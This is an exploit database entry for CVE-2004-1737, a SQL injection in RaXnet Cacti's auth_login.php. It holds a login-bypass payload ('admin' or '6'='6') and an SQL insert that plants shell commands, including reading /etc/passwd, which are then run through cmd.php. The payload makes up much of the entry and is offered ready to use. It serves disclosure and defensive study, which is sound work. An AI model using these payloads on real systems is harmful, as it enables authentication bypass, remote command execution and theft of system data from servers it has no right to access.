RaXnet Cacti 0.6.x/0.8.x - 'Auth_Login.php' SQL Injection

Author: Fernando Quintero
type: webapps
platform: php
port: 
date_added: 2004-07-16 
date_updated: 2013-01-26 
verified: 1 
codes: CVE-2004-1737;OSVDB-8989 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/10960/info

RaXnet Cacti is reportedly affected by a remote SQL injection vulnerability. This issue occurs in the auth_login.php script due to a failure of the application to properly sanitize user-supplied "username" URI parameter input before using it in an SQL query.

It is demonstrated that an attacker may exploit this vulnerability in order to bypass the authentication interface used by Cacti.

username = admin' or '6'='6
password = password wished

insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community,
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3)
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500',
'hack', '/', '3', 'NULL', 'NULL', 'NULL');

Then points to http://www.example.com/cacti/cmd.php and the command will be
executed.